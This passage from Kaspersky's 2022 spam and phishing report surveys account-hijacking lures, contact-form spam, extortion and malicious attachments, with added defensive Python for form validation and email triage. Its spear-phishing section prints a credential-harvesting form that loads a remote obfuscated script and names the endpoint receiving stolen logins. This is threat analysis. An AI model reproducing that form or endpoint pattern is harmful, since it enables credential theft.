Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing.
The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials promised victims they could have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim.
The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to have a search run for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search — the scammers simply stole the credentials they requested for the check.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

The Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it.
The cybercriminals were betting on users going straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

The Telegram auction platform named Fragment went live in October 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic.
Others are offered hefty amounts under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk threefold by year-end.

### Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190–4200 in VAT refunds. To get the money, the victim was invited to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund.
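The contact-form abuse described above works only because the site echoes whatever the submitter typed back to an arbitrary address. The following is an added example of the server-side checks a form owner can apply, not code from Kaspersky or from the report; the `Submission` field names, the `find_problems` and `build_auto_reply` helpers and the sample submissions are all constructed for illustration:

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Material that has no business in a name/login field of a contact form:
# URLs, bare domains in TLDs commonly used for phishing pages, and HTML.
URL_RE = re.compile(
    r"(?:https?://|www\.|\b[a-z0-9-]+\.(?:com|xyz|cn|top|org|ru|net|site|online|info)\b)",
    re.IGNORECASE,
)
HTML_RE = re.compile(r"<[^>]+>")
# A person's name: letters, digits, spaces, dots, apostrophes and hyphens only.
NAME_RE = re.compile(r"^[\w .'\-]{1,80}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
MAX_MESSAGE_LEN = 2000


@dataclass(frozen=True)
class Submission:
    """One contact-form submission (hypothetical field names)."""
    name: str
    email: str
    message: str


def find_problems(sub: Submission) -> List[str]:
    """Return the fields that look like a smuggled spam payload; empty if clean."""
    problems = []
    if not NAME_RE.match(sub.name) or URL_RE.search(sub.name):
        problems.append("name")           # link or markup hidden in the name field
    if not EMAIL_RE.match(sub.email):
        problems.append("email")
    if URL_RE.search(sub.message) or HTML_RE.search(sub.message):
        problems.append("message")        # links or images destined for the auto-reply
    if len(sub.message) > MAX_MESSAGE_LEN:
        problems.append("message_length")
    return problems


def build_auto_reply(sub: Submission) -> Optional[dict]:
    """Build the confirmation e-mail, or None if the submission must be held.

    The body is fixed text: nothing the submitter typed is echoed back, so even a
    submission that slips past the checks cannot turn the reply into a spam carrier.
    """
    if find_problems(sub):
        return None  # hold for manual review instead of mailing the listed address
    return {
        "to": sub.email,
        "subject": "We received your request",
        "body": "Thank you for contacting us. We will reply within two business days.",
    }


# Constructed sample submissions (not real data).
LEGIT = Submission("Anna Petrova", "anna@example.org", "I would like a quote for 200 units.")
SCAM_NAME = Submission(
    "Claim your VAT refund now: http://refund-vat.example",  # payload in the name field
    "victim@example.com",                                     # the victim, not the sender
    "-",
)
SCAM_MESSAGE = Submission(
    "Support",
    "victim@example.com",
    'Your prize is waiting <img src="x"> visit promo-claim.xyz today',
)

if __name__ == "__main__":
    for s in (LEGIT, SCAM_NAME, SCAM_MESSAGE):
        print(s.name[:30], "->", find_problems(s) or "ok")
```

The two halves matter together: field validation catches the obvious payloads, and a fixed-text auto-reply means that whatever gets through cannot be relayed under the organization's own sender address. Requiring a login or a CAPTCHA before the form can be submitted, and rate-limiting confirmations per recipient address, close the rest of the gap the report describes.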
We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" — in fact, populated by bots — where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case".
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through bank transactions. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia.
The email text emphasized the fact that many transport companies refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

There were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted.
Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and details of specific organizations, creating a context appropriate to the company's profile, and using business language. They also exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, as business correspondence between different organizations, and even as notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Masking malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that the email was legitimate, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants as a reply to an earlier email in the thread. This thread-hijacking trick makes malicious emails harder to spot, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, opening the malicious document loaded either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>).
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot can also harvest emails from the infected host for use in further attacks of this kind.

Mailings imitating notifications from various ministries and other government organizations became more frequent in the Runet. Emails were often designed with the specific activities of the organization they impersonated in mind. The sender addresses copied the naming logic of real email addresses at the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". In one of these mailings, for example, the malicious attachment exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda either. In particular, malware was distributed under the guise of call-up papers "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks on businesses around the world. In addition to typical single-stage campaigns, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim for details of its products and services.
Only after the victim responds to this email do the attackers start the phishing attack proper.

Key facts:

 * Attackers use fake Dropbox pages created with a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

_Number of emails related to the two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments, so there is little for a content filter to act on. A sender address in a free domain, like gmail.com, may raise doubts. The email in the screenshot below was sent from an address in this domain, and the company name in the _From_ field differs from the name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical of spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either [spoof the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are quick to block email addresses spotted sending spam.
This is the most likely reason why the attackers used different addresses in the _From_ header (where the email came from) and the _Reply-To_ header (where the reply goes when you click "Reply" in your email client). As a result, the victim responds to a different address, which may be located in another free domain, such as outlook.com. The address in the _Reply-To_ header is never used for sending spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After victims respond to the first email, the attackers send a new message asking them to follow a link to a file-sharing site and view a PDF file with a completed order.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

Clicking the link takes the user to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials for specific services. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button.
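The header tricks described above (a free-mail _From_ address, a _Reply-To_ pointing somewhere else, a company name in _From_ that the signature does not mention, a first email with no link or attachment, and a second-stage link to a file-sharing lookalike) lend themselves to a simple mail-gateway triage rule. The following is an added example, not code from the Kaspersky report or from the phishing kit: the three sample messages, their addresses and domains are constructed for the illustration, and the lists of free webmail domains and impersonated brands are assumptions you would tune for your own environment.

```python
"""Header-level triage for the two-stage "request for quote" lure described above.

Added illustration, not code from the Kaspersky report. It flags the traits the
report describes in the first-stage email (free webmail From, Reply-To that
redirects the answer, From display name absent from the signature, no links
or attachments) and, for the second stage, a URL whose host borrows a
file-sharing brand name without being that brand's domain.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Free webmail domains named in the report; extend for your environment (assumption).
FREEMAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
# Brands the phishing kit imitates, mapped to the brand's real domain (assumption).
BRAND_DOMAINS = {"dropbox": "dropbox.com", "wetransfer": "wetransfer.com"}
URL_RE = re.compile(r"https?://[^\s<>]+")


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _parse(raw: str):
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    return msg, text


def triage(raw: str) -> dict:
    """Return the first-stage indicators found in one RFC 5322 message."""
    msg, text = _parse(raw)
    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    findings = []
    if _domain(from_addr) in FREEMAIL_DOMAINS:
        findings.append("freemail_sender")
    if reply_addr and reply_addr.lower() != from_addr.lower():
        findings.append("replyto_differs_from_from")
        if _domain(reply_addr) != _domain(from_addr):
            findings.append("replyto_domain_mismatch")
    # The display name claims a company that the body/signature never mentions.
    if from_name and from_name.lower() not in text.lower():
        findings.append("display_name_not_in_body")
    # Nothing for a link or attachment filter to act on: typical of stage one.
    if not URL_RE.search(text) and not list(msg.iter_attachments()):
        findings.append("no_links_or_attachments")
    return {"from": from_addr, "reply_to": reply_addr, "findings": findings}


def lookalike_links(raw: str) -> list:
    """URLs whose host contains a file-sharing brand name but is not that brand's domain."""
    _, text = _parse(raw)
    hits = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        for brand, legit in BRAND_DOMAINS.items():
            if brand in host and host != legit and not host.endswith("." + legit):
                hits.append(url)
    return hits


# Constructed sample messages (names, addresses and domains are invented).
FIRST_STAGE = """\
From: Northwind Trading Ltd <northwind.purchasing@gmail.com>
Reply-To: nw.orders2022@outlook.com
To: sales@supplier.example
Subject: Request for product catalogue and prices
Content-Type: text/plain; charset="utf-8"

Dear Sales Team,

We are interested in your range of products. Please send us your
catalogue and current price list.

Best regards,
John Carter
Purchasing Manager, Contoso Imports Inc.
"""

SECOND_STAGE = """\
From: Northwind Trading Ltd <northwind.purchasing@gmail.com>
To: sales@supplier.example
Subject: Re: Request for product catalogue and prices
Content-Type: text/plain; charset="utf-8"

Thank you. Please review our completed order in the PDF below:
https://dropbox-share.files-view.example/order/view.pdf
"""

LEGIT = """\
From: Jane Doe <jane.doe@partner-corp.example>
To: sales@supplier.example
Subject: Re: Invoice 1042
Content-Type: text/plain; charset="utf-8"

Hi, the signed invoice is at https://portal.partner-corp.example/invoices/1042

Regards,
Jane Doe, Partner Corp
"""

if __name__ == "__main__":
    for name, sample in (("first", FIRST_STAGE), ("second", SECOND_STAGE), ("legit", LEGIT)):
        print(name, triage(sample)["findings"], lookalike_links(sample))
```

Run it on a saved `.eml` with `triage(open(path).read())`. The display-name check is only a heuristic (a real sender may omit the company name in a short reply), so treat it as one signal to combine with the Reply-To mismatch rather than a verdict on its own.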
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

```html
<!-- Excerpt of the harvesting page. The form has no action attribute: submission
     is handled by the externally hosted, obfuscated script included below, which
     is the likely sender of the credentials to the herokuapp endpoint named above. -->
<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div> <!-- closes a container element that begins outside this excerpt -->
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>
```

**_HTML representation of the phishing form_**

### Victims

We identified targets of this campaign around the world, including in the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, 3.07 p.p. more than in 2021.
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the quietest month: only 45.20% of the emails sent that month were spam.

In the Runet (the Russian segment of the internet), the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the same gradual shift in favor of legitimate correspondence can be seen there. The largest share of spam in the Runet was recorded in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Runet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. The quietest month in the Runet was December (47.18%), the same as globally.

### Countries and territories – sources of spam

In 2022, the share of spam sent from Russia continued to grow, from 24.77% to 29.82%. Mainland China (14.00%), whose share increased by 5.27 percentage points, swapped places with Germany (5.19%) and moved up to second place.
Third place is still held by the United States (10.71%).

_TOP 20 countries and territories – sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments, an increase of 18 million on the previous year. The component triggered most often in March, May and June 2022.

_Number of Mail Anti-Virus hits, January–December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), although their share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), which spread as archived electronic documents, moved down to third. Fourth place went to exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than exploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (1.80%) in the same component. Both vulnerabilities were patched years ago, and Microsoft removed the legacy Equation Editor binary from Office in January 2018, so detections of these exploits point at Office installations that have not been updated since then.
This vulnerability was more widespread in 2021 and has now dropped to tenth place.

_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_

[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to fifth place, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement took the botnet down in early 2021, but by fall its operators had rebuilt the infrastructure, and in 2022 it was being actively distributed again. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the Task Scheduler.

_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

### Countries and territories targeted by malicious mailings

Spain remained the leader in terms of blocked malicious attachments in 2022 (8.78%), a slight decrease compared to 2021 (9.32%).
The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%) and fourth to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on the computers of users in Germany (3.85%) continued to decrease. The share of the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices in Vietnam (17.03%); in 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), up from seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) are new entries at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh.
Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

**Country/territory** | **Share of attacked users***
---|---
Vietnam | 17.03%
Macau | 13.88%
Madagascar | 12.04%
Algeria | 11.05%
Ecuador | 11.05%
Malawi | 10.91%
Brunei | 10.59%
Brazil | 10.57%
Morocco | 10.43%
Portugal | 10.33%

**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the largest share of phishing pages was hosted in the COM domain zone, but that share almost halved, from 31.55% to 17.69%. The XYZ zone (8.79%) remained in second place, although its share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

The ORG (3.89%) and TOP (1.80%) domains swapped places relative to 2021 but remained in fourth and fifth places. The rest of the ten domain zones most in demand among cybercriminals were RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers.
The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

In 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) complete the TOP 10 categories of sites of interest to criminals.

### Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. By the end of the year, however, the number of phishing attacks on the messenger's users had increased dramatically: 44,700 in October, 83,100 in November and 125,000 in December.
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).

_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January–December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_

